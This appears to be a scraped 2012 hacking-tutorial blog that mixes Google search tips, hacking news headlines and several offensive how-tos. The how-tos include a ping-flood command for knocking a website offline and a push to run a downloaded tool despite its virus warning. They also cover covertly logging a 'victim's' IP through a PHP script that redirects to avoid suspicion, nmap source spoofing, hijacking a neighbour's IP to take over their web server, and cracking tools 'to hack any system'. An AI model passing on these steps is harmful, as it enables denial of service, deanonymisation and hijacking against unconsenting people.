Google queries are not case sensitive: Google doesn’t care if you type your query in lowercase letters (hackers), uppercase (HACKERS), camel case (hAcKeR), or psycho-case (haCKeR)—the word is always regarded the same way. This is especially important when you’re searching things like source code listings, when the case of the term carries a great deal of meaning for the programmer. The one notable exception is the word or. When used as the Boolean operator, or must be written in uppercase, as OR.

Google wildcards: Google’s concept of wildcards is not the same as a programmer’s concept of wildcards. Most consider wildcards to be either a symbolic representation of any single letter (UNIX fans may think of the question mark) or any series of letters represented by an asterisk. This type of technique is called stemming. Google’s wildcard, the asterisk (*), represents nothing more than a single word in a search phrase. Using an asterisk at the beginning or end of a word will not provide you any more hits than using the word by itself.

Google reserves the right to ignore you: Google ignores certain common words, characters, and single digits in a search. These are sometimes called stop words. When Google ignores any of your search terms, you will be notified on the results page, just below the query box. Some common stop words include who, where, what, the, a, or an. Curiously enough, the logic for word exclusion can vary from search to search.

Learn How to Create your own SMS channel on Google to update your latest posts through SMS

I have created 3 channels for my 3 blogs as cited below:





Step 1:
Open this link on your browser http://labs.google.co.in/smschannels/browse

Step 2: Before subscribing to or creating an SMS Channel, you need to select a nickname and verify your mobile number.
Step 3: Give your nickname and mobile number and click on "send verification code". You will receive an SMS with a verification code. Enter the verification code and click on finish setup.

Step 4: To subscribe to available channels, click on the subscribe button.
Step 5: To Create your own channel and to alert your friends in real time through SMS CLICK HERE. You can create your own channel(s) to receive regular alerts over SMS on specific topics that interest you. You can also invite others to subscribe to your channel(s). You can use your channel(s) as a discussion group as well, allowing other people to post messages.

Step 6: After filling all the information, click on create channel

Adobe Announced Security Breach: Code-Signing Server Hacked | Hacking News & Cyber Updates: 28th Sept 10 PM


City of Lumberton's website hacked
Sacramento Bee
LUMBERTON, N.C. -- The city of Lumberton's website has been hacked for more
than two hours by someone who said he was a Turkish Muslim. Lumberton
information management director Travis Branch says someone embedded a message
on the city's ...
US Bank, PNC hacked, report website problems
WZZM
(AP) - Two more major American banks, U.S. Bank and PNC, reported problems with
their customer websites Wednesday after a financial services security group warned 
about possible cyberattacks. U.S. Bank spokesman Tom Joyce said some customers ...
Philippine websites hacked over cybercrime law
Phys.Org
The group calling itself "Anonymous Philippines" hacked websites for the central
bank, the Manila water service and other agencies to say the bill, which was signed 
into law earlier this month, violated people's rights. "The Philippine government has ...
Sarasota employees hacked police network, consultant says
Sarasota Herald-Tribune
The report of a secret electronic link between City Hall and the law enforcement network
— where confidential records and security databases are supposed to be guarded — 
adds a new wrinkle to an investigation that has already triggered the city ...
Facebook and Gates Foundation host education hackathon
CNET
"At Facebook, we believe that a more open and connected world can have a big impact in addressing some of society's biggest issues," the social network wrote in a blog post about "HackEd" today. "Nowhere is that opportunity more clear than education."...

Lumberton website hacked, person claiming to be Turkish Muslim posts message
Fayetteville Observer
LUMBERTON - The city of Lumberton's website was hacked Wednesday night by
someone who says he is a Turkish Muslim and goes by the name SlyHacker. A
message was embedded over the city's site about 10:30 p.m., said Travis Branch,
director of the ...
Prison CCTV System has been Hacked by a Worm Named Conficker
SPAMfighter News
The famous conficker worm have hacked all the computers that control closed circuit
television (CCTV) system of an unknown prison, as published by softpedia.com on
September 19, 2012. Representatives from the correctional institutions were adamant
that ...
Cybercrime: Islamist group claims it hacked Wells Fargo site
Equities.com
Cybercrime: Islamist group claims it hacked Wells Fargo site. Dominic Rushe in New
York Guardian. US banking company Wells Fargo is believed to have become the latest
victim of a cyber attack launched by a group pledging retaliation for the Innocence ...
Zynga Games Lose A Couple Hundred Thousand Fans In The Facebook Fake ...
Kotaku Australia
Facebook has implemented countermeasures to purge fake, forged, hacked or otherwise
unsavory 'Likes' from its pages, resulting in the sudden departure of several hundred 
thousand of Zynga's several hundred million fans. The 'Like' is a powerful unit of ...
Cops: Hampton Bays Man Stole $9600 With Computer
Patch.com
19, saying he hacked into a someone's personal bank account and helped himself to
$9,600. Police said 28-year-old Matthew Rewinski was charged with grand larceny in the 
third degree and two counts of computer tampering in the first degree, both ...
Adobe finds a code-signing server has been hacked - The Next Web
By Emil Protalinski
Adobe today announced it has been subject to a significant security breach, including a compromised build server resulting in at least one valid Adobe code signing certificate
being used maliciously. As a result, the software company will be ...
The Next Web

DOS ATTACK ON WEBSITE.


DOWNLOAD TOOL FROM HERE.
ALTHOUGH IT SHOWS THAT THE FILE IS VIRUS INFECTED, IT'S NOT.
PLACE THE I.P ADDRESS OR DOMAIN NAME OF THE WEBSITE & PRESS ENTER.

OR YOU CAN ALSO DO IT MANUALLY. JUST OPEN CMD & TYPE THE COMMAND. BUT IT'S AN OLD METHOD, SO I RECOMMEND YOU USE THE TOOL.

ping (Ip Address) -t -l 65000

IF YOU WANT TO KNOW MORE ABOUT IT. PLEASE READ FOLLOWING DOCUMENT.
IT HAS EXPLAINED EVERYTHING. CLICK HERE.

Tuesday, September 25, 2012

How to Find i.p Address of Remote computer?



This article is about getting the IP address of a remote computer, i.e., in hacking terms, getting the IP address of the victim computer.
Before proceeding, let's learn something about IP addresses.

0x01-What is IP address?
IP address means Internet Protocol address - An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer etc.) participating in a computer network that uses the Internet Protocol for communication.
IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing


Now let's move to our motto..........
0x02-How to get IP address of remote computer or victim computer?
There are four techniques to get the IP address of remote computer or victim computer. These are as follows:
  1. Using PHP notification script.
  2. Sniffing during chat sessions.
  3. Using Blogs and Websites.
  4. Using read notify service.
Now let's go into detail one by one ....................
1. Using PHP notification script.
Using this Notification script you can get the IP address in just seconds.
Steps of using this PHP script:
  1. Open a new account in X10Hosting (or any other free host that supports PHP).
  2. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.
  3. You can rename ip.php to any name of your choice.
  4. Set the permission to 777 on ip_log.txt.
You have to send the link of ip.php to your friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the date and time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.


2. Sniffing during chat sessions.
With the help of sniffers like Wireshark, you can sniff Gmail, Yahoo or any other chat sessions while you are chatting with any of your friends and extract the IP address from there.

3. Using Blogs and Websites.
This method is for those who have their own blogs or websites. Normal users can also do this, as a blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget, put the histats code there and save the template. Then send the link of your blog to your friend and get his IP.

4. Using read notify service.
Read Notify is an email-based service.
The steps to use the Read Notify service are as follows:
a) First open the Read Notify website: RCPT
b) Now register on this website and it will send you a confirmation mail. Verify your account.
c) Once your account is activated, do the following steps to use this service:
  1. Compose your email just like you usually would in your own email or web email program.
  2. Type: .readnotify.com on the end of your recipient's email address (don’t worry, that gets removed before your recipients receive the email). Like this: hackersfind@gmail.com.readnotify.com .
  3. Send your email.
Some things to remember:
  • don’t send to and from the same computer.
  • if your email program ‘auto-completes’ email addresses from your address book, you’ll need to keep typing over the top of the auto-completed one to add the .readnotify.com.
  • if you are cc-ing your email to other readers, you must add tracking to all of them.


Using nmap to change a source address

Using nmap to change a source address. The commands used are:
nmap -iflist
...to get a list of available interfaces. When an interface is chosen (in this tutorial, eth0 is chosen) use the name of the interface in the next command:
nmap -e eth0 -S 192.168.1.100 192.168.1.109
...which will use the eth0 interface and spoof a source IP of 192.168.1.100, while scanning 192.168.1.109. Because the source address is spoofed, the return traffic from the target host will not be routed back to us. Thus, all ports will appear to be closed.



Monday, September 24, 2012

How To change your I.P address?

Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server, and dns servers.


1. Getting your IP range - Getting information about your IP range is not difficult, I recommend using Neo Trace on your own IP. But for my test just look at your IP address, say it's 24.193.110.13 you can definitely use the IP's found between 24.193.110.1 < [new IP] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig at the prompt, look for "IP Address. . . . . . . . . . . . : x.x.x.x".

2. Subnet Mask, Default Gateway, DHCP Server - These are very easy to find, just open a dos/command prompt window and type 'ipconfig /all' without the ' '. You should see something like this:
Windows IP Configuration:

Host Name . . . . . . . . . . . . . . : My Computer Name Here
Primary Dns Suffix . . . . . . . . . :
Node Type . . . . . . . . . . . . . . .: Unknown
IP Routing Enabled. . . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . . . . . . .: xxxx.xx.x
Description . . . . . . . . . . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI)
Physical Address. . . . . . . . . . . . . . . . . : XX-XX-XX-XX-XX-XX
Dhcp Enabled. . . . . . . . . . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . . . . . . : Yes
IP Address. . . . . . . . . . . . . . . . . . . . . : 24.xxx.xxx.xx
Subnet Mask . . . . . . . . . . . . . . . . . . . .: 255.255.240.0
Default Gateway . . . . . . . . . . . . . . . . . : 24.xxx.xxx.x
DHCP Server . . . . . . . . . . . . . . . . . . . .: 24.xx.xxx.xx
DNS Servers . . . . . . . . . . . . . . . . . . . . : 24.xx.xxx.xxx
24.xx.xxx.xx
24.xx.xxx.xxx
Lease Obtained. . . . . . . . . . . . . . . . . . .:Monday, January 20, 2003 4:44:08 PM
Lease Expires . . . . . . . . . . . . . . . . . . . .:Tuesday, January 21, 2003 3:43:16 AM


This is all the information you will need for now, I suggest you either keep your dos/command prompt window open or copy & paste the information somewhere, to copy right click the window and select text and click once.

III. Changing your IP Address

To change your IP address, first pick any IP you like out of your IP range and remember it or write it down. It is usually a good idea to make sure the IP is dead (except for what we are going to do later on), so just ping it via "ping x.x.x.x" and if it times out then you can use it. Now go to My Computer, then Control Panel. In Control Panel select Network Connections and pick your active connection, probably Local Area Connection or your ISP name. Open that connection by double-clicking on the icon in Network Connections, then select Properties under the General tab. In the new window that pops up select Internet Protocol (TCP/IP) and click Properties; it's under the General tab. In this new window select the General tab and choose "Use the following IP address", and for the IP address enter the IP you would like to use (the one you picked from your subnet earlier), and for the Subnet Mask enter the subnet mask you got when you ran ipconfig /all; the same goes for the Default Gateway. Now select "Use the following DNS server addresses" and enter the information you got earlier. Now just click OK. Test that it worked: try to refresh a website, and if it works you know everything is okay and you are connected. To make sure the change worked, type ipconfig again and the IP address should have changed to your new one.

IV. DDoS & DoS Protection

If your firewall shows that you are being DDoSed (this is usually when you are constantly getting attempted UDP connections several times a second from either the same IP address or multiple IP addresses (DDoS)), you can protect yourself by changing your IP address via the method I described above.

V. Web servers & Other Services

If you know someone on your IP range is running a web server and he or she has pissed you off or you just like messing around you can "steal" their IP address so any DNS going to that IP will show your site instead because you would be running a web server yourself.

To "steal" an IP is basically to use the changing IP address method above and pick an IP that someone who is running a web server has in use. Often you will be able to keep that IP at least for some time; other times you won't be able to use it, so just keep trying until it works. You yourself will need to have a web server on the same port with your message. You can do this with other services too. You can also DoS or DDoS the IP address you are trying to steal to kick him off the net, but I don't recommend it as it's pretty illegal, and your ISP will get pissed ;)

Sunday, September 23, 2012

how to install metasploit in ubuntu?

(1) First download the latest version of Metasploit for Linux from here.

(2) The next step is to move the downloaded file into your home folder. We want to make the .run file executable, so run the following command in your terminal.

(3) sudo chmod +x metasploit-latest-linux-installer.run

(4) sudo ./metasploit-latest-linux-installer.run
After that, the uncompress process will start and it will install automatically.
Follow some basic steps and get the activation code.
Open a terminal and run the following command:

(5) msfconsole
It will show
msf>


Friday, September 21, 2012

List of Useful Hacking Tools


Here I am listing some good free hacking software which is very useful to hack any system. Download from HERE.

(1)NESSUS-Nessus is one of the most popular and capable vulnerability scanners, particularly for UNIX systems. It was initially free and open source, but they closed the source code in 2005 and removed the free "Registered Feed" version in 2008. It now costs $1,200 per year, which still beats many of its competitors. A free “Home Feed” is also available, though it is limited and only licensed for home network use.

Nessus is constantly updated, with more than 46,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a web-based interface, and an embedded scripting language for writing your own plugins or understanding the existing ones. The open-source version of Nessus was forked by a group of users who still develop it under the OpenVAS name.

(2)METASPLOIT-Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their list of modules. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality.

Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants. The Framework itself is still free and open source, but they now also offer a free-but-limited Community edition, a more advanced Express edition ($3,000 per year per user), and a full-featured Pro edition ($15,000 per user per year). Other paid exploitation tools to consider are Core Impact (more expensive) and Canvas (less).

The Metasploit Framework now includes an official Java-based GUI and also Raphael Mudge's excellent Armitage. The Community, Express, and Pro editions have web-based GUIs.

(3)AIR-CRACK -Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It implements the best known cracking algorithms to recover wireless keys once enough encrypted packets have been gathered. The suite comprises over a dozen discrete tools, including airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

(4)JOHN THE RIPPER-John the Ripper is a fast password cracker for UNIX/Linux and Mac OS X. Its primary purpose is to detect weak Unix passwords, though it supports hashes for many other platforms as well. There is an official free version, a community-enhanced version (with many contributed patches but not as much quality assurance), and an inexpensive pro version.

(5)CAIN & ABEL- It's a password cracker tool for Windows, like John the Ripper (Unix). UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

(6)NMAP-Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

YOU CAN DOWNLOAD ALL THESE TOOLS FROM THE LINK BELOW
http://sectools.org/

There are lots of tools, but download only those which are necessary for you. And use them carefully.